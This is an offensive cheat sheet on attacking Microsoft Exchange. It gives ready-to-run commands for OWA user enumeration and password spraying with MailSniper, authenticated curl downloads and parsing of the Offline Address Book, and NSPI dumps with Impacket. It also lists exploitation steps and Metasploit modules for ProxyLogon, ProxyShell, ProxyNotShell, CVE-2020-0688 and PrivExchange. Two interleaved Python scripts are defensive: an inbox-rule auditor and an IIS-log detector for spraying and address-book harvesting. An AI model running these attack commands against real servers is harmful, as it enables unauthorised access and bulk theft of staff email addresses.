Attacking Exchange Servers Book

Remote Access Protocols

  • Exchange Web Services (EWS)
  • Exchange ActiveSync (EAS)
  • Outlook Anywhere
  • MAPI over HTTP

AutoDiscover Service

  • Retrieves Exchange configuration
  • Mailbox settings
  • Supported protocols
  • Service URLs
  • Associated with autodiscover.xml in the autodiscover virtual directory

Outlook Web Application (OWA)

  • Web-based email client
  • Accessible with a browser
  • No Outlook installation required

Global Address List (GAL)

  • List of every mail-enabled object in an Active Directory forest

Outlook Features

Rules

  • Automated actions for incoming/outgoing emails
  • Trigger and action creation
  • Server-side and client-side execution

Forms

  • Email customization options
  • Autocompletion of fields
  • Template text

Security Threats

  • User enumeration
  • Password spraying
  • Email address extraction from GAL, Offline Address Book (OAB), or using NSPI
  • Public point-and-click exploits
  • Data exfiltration
  • Exploitation through client software
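The Rules section above notes that Outlook rules can run server-side, and the threat list names data exfiltration; in practice the two meet when a mailbox rule forwards or redirects mail outside the organisation, or silently deletes it. The following is an added defensive example written for this page, not code from the book: it audits a CSV export of `Get-InboxRule` output (column names assumed to be that cmdlet's property names; the sample rows are constructed, and `INTERNAL_DOMAINS` is an assumed list of the organisation's own mail domains).

```python
"""Audit an export of Outlook inbox rules for actions commonly used to exfiltrate mail.

Added example, not code from the book. It assumes a CSV export of
Get-InboxRule output whose columns carry that cmdlet's property names, and
that INTERNAL_DOMAINS lists the organisation's own mail domains.
"""
import csv
import io
import re

INTERNAL_DOMAINS = {"windomain.local"}  # assumption: the org's own mail domains
SMTP_RE = re.compile(r"\[SMTP:([^\]]+)\]", re.IGNORECASE)

# Constructed sample export, not real data. Recipient fields use the
# '"Display Name" [SMTP:address]' form that Get-InboxRule prints.
SAMPLE_CSV = '''\
Identity,Name,Enabled,ForwardTo,ForwardAsAttachmentTo,RedirectTo,DeleteMessage,MoveToFolder
alice\\123,Newsletters,True,,,,False,alice:\\Newsletters
alice\\456,.,True,"""Backup"" [SMTP:backup@mail-archive.example]",,,True,
bob\\789,Invoices,True,,,"""Bob Phone"" [SMTP:bob@windomain.local]",False,
carol\\321,Helpdesk,False,,"""Ext"" [SMTP:x@outside.example]",,False,
'''


def external_addresses(field):
    """Return the SMTP addresses in a recipient field whose domain is not ours."""
    found = []
    for addr in SMTP_RE.findall(field or ""):
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain not in INTERNAL_DOMAINS:
            found.append(addr)
    return found


def audit_rules(csv_text):
    """Return one finding per rule that forwards/redirects externally, deletes mail,
    or carries a near-empty name (a common trick to hide a rule in the Outlook UI)."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = []
        for col in ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"):
            ext = external_addresses(row.get(col))
            if ext:
                reasons.append(f"{col} -> {', '.join(ext)}")
        if row["DeleteMessage"].strip().lower() == "true":
            reasons.append("DeleteMessage")
        if len(row["Name"].strip()) <= 1:
            reasons.append("near-empty rule name")
        if reasons and row["Enabled"].strip().lower() != "true":
            reasons.append("currently disabled")  # still worth review: it can be re-enabled
        if reasons:
            findings.append({"identity": row["Identity"], "name": row["Name"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_rules(SAMPLE_CSV):
        print(finding["identity"], repr(finding["name"]), "; ".join(finding["reasons"]))
```

Run it against a real export by replacing `SAMPLE_CSV` with the file contents; a rule that combines external forwarding with `DeleteMessage` and a one-character name is the classic shape worth escalating first.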

User Enumeration & Password Spraying

  1. hunter.io
  2. MailSniper (https://github.com/dafthack/MailSniper)
  3. OABURL (https://gist.github.com/snovvcrash/4e76aaf2a8750922f546eed81aa51438#file-oaburl-py)

MailSniper

  • First we need to find the target's domain name, using the Invoke-DomainHarvestOWA function from MailSniper.

  • It has two options for obtaining the correct domain name.

Finding the domain name with MailSniper

Invoke-DomainHarvestOWA -ExchHostname $IP

User enumeration with MailSniper

Invoke-UsernameHarvestOWA -UserList .\user.txt -ExchHostname $IP -Domain windomain.local -OutFile found.txt

Password spraying with MailSniper

Invoke-PasswordSprayOWA -ExchHostname $IP -UserList .\found.txt -Password Qwerty123! -OutFile creds.txt

Dumping and Exfiltration

GAL Extraction using MailSniper from Compromised Account

Get-GlobalAddressList -ExchHostname 192.168.56.106 -UserName windomain.local\vinegrep -Password Qwerty123! -OutFile gal.txt

GAL email extraction using OAB

  1. Issue a web request to the autodiscover endpoint to retrieve autodiscover.xml.
  2. Search the response for the OABUrl value, which is the path to the directory holding the OAB files. Do not miss the other useful information in the same response, such as the domain user's SID and the domain controller name.
  3. Request oab.xml from the OABUrl location to list the OAB filenames.
  4. In oab.xml, search for a filename that includes "data" and has the .lzx extension.
  5. Download this file and parse it.

Retrieving the OABUrl with oaburl.py:

python3 oaburl.py windomain.local/vinegrep:'Qwerty123!'@192.168.56.106 -e 'vinegrep@windomain.local'

Next, we download oab.xml and search it for the .lzx filename that contains the word data; this is the GAL OAB file. As a last step, we download that file, decompress it with oabextract, and extract the email addresses with a regular expression:

curl -k --ntlm -u 'windomain.local\vinegrep:Qwerty123!' https://exchange.windomain.local/OAB/e79472bb-2dd6-4ffb-9e02-8dd42510bb1b/oab.xml > oab.xml
grep '\.lzx' oab.xml | grep data

curl -k --ntlm -u 'windomain.local\vinegrep:Qwerty123!' https://exchange.windomain.local/OAB/e79472bb-2dd6-4ffb-9e02-8dd42510bb1b/007215f1-4ab8-4ed2-a503-4cd82b0d8093-data-1.lzx > oab.lzx

./oabextract oab.lzx oab.txt

strings oab.txt | grep -Eo "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,5}" | sort -u
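Both of the techniques above leave a footprint in the Exchange front end's IIS logs: a password spray is a burst of POSTs to /owa/auth.owa from one client address, and an OAB harvest is a download of the -data-N.lzx file by something that is not Outlook. The following is an added defensive example written for this page, not code from the book or from MailSniper. It assumes the default IIS W3C field layout shown in the embedded (constructed) log excerpt, that each guessed account produces one auth.owa POST, and that legitimate OAB data-file downloads come from clients whose User-Agent identifies as Outlook/Office; the window and threshold values are tuning assumptions.

```python
"""Spot OWA password spraying and bulk OAB (GAL) downloads in IIS W3C logs.

Added example, not code from the book or from MailSniper. Assumptions:
the default IIS W3C field layout below, one POST to /owa/auth.owa per
guessed account, and OAB data files normally fetched only by Outlook.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SPRAY_WINDOW = timedelta(minutes=5)
SPRAY_THRESHOLD = 10  # auth.owa POSTs from one client IP inside the window (tuning assumption)
OAB_DATA_RE = re.compile(r"^/oab/[0-9a-f-]{36}/.+-data-\d+\.lzx$", re.IGNORECASE)
OUTLOOK_UA_RE = re.compile(r"Microsoft Office|Outlook", re.IGNORECASE)

# Constructed sample log, not real traffic (203.0.113.0/24 is documentation space).
_HEADER = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus"""
_NORMAL = """\
2024-01-10 08:55:10 10.0.0.5 POST /owa/auth.owa - 443 - 10.0.0.20 Mozilla/5.0+(Windows+NT+10.0) 302 0
2024-01-10 08:55:11 10.0.0.5 GET /owa/ - 443 WINDOMAIN\\alice 10.0.0.20 Mozilla/5.0+(Windows+NT+10.0) 200 0
2024-01-10 08:58:02 10.0.0.5 GET /OAB/e79472bb-2dd6-4ffb-9e02-8dd42510bb1b/oab.xml - 443 WINDOMAIN\\alice 10.0.0.20 Microsoft+Office/16.0+(Windows+NT+10.0;+Microsoft+Outlook+16.0.10000) 200 0
2024-01-10 08:58:03 10.0.0.5 GET /OAB/e79472bb-2dd6-4ffb-9e02-8dd42510bb1b/007215f1-4ab8-4ed2-a503-4cd82b0d8093-data-1.lzx - 443 WINDOMAIN\\alice 10.0.0.20 Microsoft+Office/16.0+(Windows+NT+10.0;+Microsoft+Outlook+16.0.10000) 200 0"""
# Twelve logon attempts in twelve seconds from one external address: the spray.
_SPRAY = "\n".join(
    f"2024-01-10 09:00:{i:02d} 10.0.0.5 POST /owa/auth.owa - 443 - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 302 0"
    for i in range(12))
# The same address later pulling oab.xml and the data file with curl.
_HARVEST = """\
2024-01-10 09:12:40 10.0.0.5 GET /OAB/e79472bb-2dd6-4ffb-9e02-8dd42510bb1b/oab.xml - 443 WINDOMAIN\\vinegrep 203.0.113.7 curl/8.4.0 200 0
2024-01-10 09:12:41 10.0.0.5 GET /OAB/e79472bb-2dd6-4ffb-9e02-8dd42510bb1b/007215f1-4ab8-4ed2-a503-4cd82b0d8093-data-1.lzx - 443 WINDOMAIN\\vinegrep 203.0.113.7 curl/8.4.0 200 0"""
SAMPLE_LOG = "\n".join([_HEADER, _NORMAL, _SPRAY, _HARVEST])


def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the #Fields names."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # skip malformed lines rather than misalign columns
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        rec["cs(User-Agent)"] = rec["cs(User-Agent)"].replace("+", " ")  # IIS encodes spaces as '+'
        records.append(rec)
    return records


def detect_spray(records):
    """Client IPs with >= SPRAY_THRESHOLD logon POSTs in any SPRAY_WINDOW; value is the peak count."""
    by_ip = defaultdict(list)
    for r in records:
        if r["cs-method"] == "POST" and r["cs-uri-stem"].lower() == "/owa/auth.owa":
            by_ip[r["c-ip"]].append(r["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > SPRAY_WINDOW:
                start += 1
            count = end - start + 1
            if count >= SPRAY_THRESHOLD:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


def detect_oab_harvest(records):
    """OAB data-file downloads by clients that do not identify as Outlook/Office."""
    return [
        (r["c-ip"], r["cs-username"], r["cs-uri-stem"], r["cs(User-Agent)"])
        for r in records
        if r["cs-method"] == "GET"
        and OAB_DATA_RE.match(r["cs-uri-stem"])
        and not OUTLOOK_UA_RE.search(r["cs(User-Agent)"])
    ]


if __name__ == "__main__":
    recs = parse_w3c(SAMPLE_LOG)
    print("possible spraying:", detect_spray(recs))
    for hit in detect_oab_harvest(recs):
        print("OAB data file pulled by non-Outlook client:", hit)
```

The User-Agent check is a weak signal on its own (a client can set any value), so the OAB hit is best read together with the source address: in the sample, the same external address that sprayed auth.owa minutes earlier is the one pulling the data file with an authenticated domain account, which is exactly the sequence the commands above produce.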

Email extraction using NSPI (Impacket)

python3 exchanger.py windomain.local/vinegrep:'Qwerty123!'@exchange.windomain.local -debug nspi list-tables -count

python3 exchanger.py windomain.local/vinegrep:'Qwerty123!'@exchange.windomain.local -debug nspi dump-tables -guid 715d9794-704c-4fe3-a038-24f149747b2c -lookup-type EXTENDED

Detailed Public Exploits Information

CVE-2021-26855 (ProxyLogon)

  • Description: Server-Side Request Forgery (SSRF) vulnerability in Microsoft Exchange Server allows bypassing authentication.
  • Requirements: Vulnerable Microsoft Exchange Server, network access to the server.
  • Vulnerability Checking Tool: Nmap script exchange-proxylogon.nse.
  • Command to Check Vulnerability: nmap --script exchange-proxylogon.nse -p 443 [Exchange Server IP]
  • Impact: Unauthenticated attackers can send arbitrary HTTP requests as the Exchange Server.
  • Exploitation Scenario:
    • Accessing emails (requires at least two Exchange servers).
    • Authenticating to Exchange Control Panel (ECP) to upload a web shell.
  • Steps for Exploitation:
    1. Check vulnerability using the Nmap script.
    2. Use Metasploit module auxiliary/scanner/http/exchange_proxylogon for scanning.
    3. Exploit using Metasploit: exploit/windows/http/exchange_proxylogon_rce.

CVE-2021-27065

  • Description: Post-authentication arbitrary file write in Microsoft Exchange Server.
  • Requirements: Access to authenticated session in ECP.
  • Vulnerability Checking Tool: Manual check via Exchange Control Panel.
  • Impact: Authenticated attackers can write files to any path on the server.
  • Exploitation Scenario: Logging into ECP and exploiting the OAB virtual directory.
  • Steps for Exploitation:
    1. Gain access to an authenticated session in ECP.
    2. Navigate to the OAB virtual directory.
    3. Edit the External URL to insert web shell code.

ProxyOracle (CVE-2021-31195 & CVE-2021-31196)

  • Description: Reflected XSS and Padding Oracle Attack on Exchange Cookies.
  • Requirements: Access to the Exchange web interface.
  • Vulnerability Checking Tool: Browser-based testing.
  • Impact: Recovery of plaintext username and password from Exchange cookies.
  • Exploitation Scenario: Reflected XSS attack via crafted URL.
  • Steps for Exploitation:
    1. Craft a URL with an XSS payload targeting the Exchange Server.
    2. Observe the response for a popup alert confirming vulnerability.

ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

  • Description: Unauthenticated RCE via a series of vulnerabilities.
  • Requirements: Vulnerable Microsoft Exchange Server.
  • Vulnerability Checking Tool: Metasploit's scanner module for ProxyShell.
  • Command to Check Vulnerability: Run the corresponding Metasploit scanner module.
  • Impact: Execution of arbitrary code without authentication.
  • Exploitation Scenario: Faulty URL normalization chained with privilege escalation.
  • Steps for Exploitation:
    1. Scan with the corresponding Metasploit scanner module.
    2. Exploit using Metasploit: exploit/windows/http/exchange_proxyshell_rce.

ProxyNotShell (CVE-2022-41040 & CVE-2022-41082)

  • Description: SSRF and RCE via PowerShell, requiring authentication.
  • Requirements: Authenticated access to Exchange Server, especially Exchange 2019.
  • Vulnerability Checking Tool: Manual check or custom scripts.
  • Impact: Authenticated RCE via PowerShell.
  • Exploitation Scenario: Exploiting SSRF for authenticated RCE.
  • Steps for Exploitation:
    1. Authenticate to the Exchange server.
    2. Use Metasploit for Exchange 2019: exploit/windows/http/exchange_proxynotshell_rce.

CVE-2020-0688

  • Description: Arbitrary code execution due to fixed cryptographic keys in ECP.
  • Requirements: Authenticated session in ECP.
  • Vulnerability Checking Tool: ysoserial.net tool for payload generation.
  • Impact: Execution of arbitrary code by authenticated attackers.
  • Exploitation Scenario: ViewState deserialization in ECP.
  • Steps for Exploitation:
    1. Log into ECP and collect ViewStateUserKey and __VIEWSTATEGENERATOR.
    2. Use ysoserial.net to generate a malicious payload.
    3. Execute the payload targeting the ECP.

PrivExchange (CVE-2018-8581)

  • Description: Privilege escalation vulnerability in Microsoft Exchange Server.
  • Requirements: Exchange Server with improper NTLM settings, network access.
  • Vulnerability Checking Tool: Custom scripts or manual testing.
  • Impact: Attacker can gain DCSync rights in a domain.
  • Exploitation Scenario: NTLM relay attack.
  • Steps for Exploitation:
    1. Set up privexchange.py targeting the Exchange Server.
    2. Use ntlmrelayx.py targeting a domain controller to escalate privileges.

Exchange Server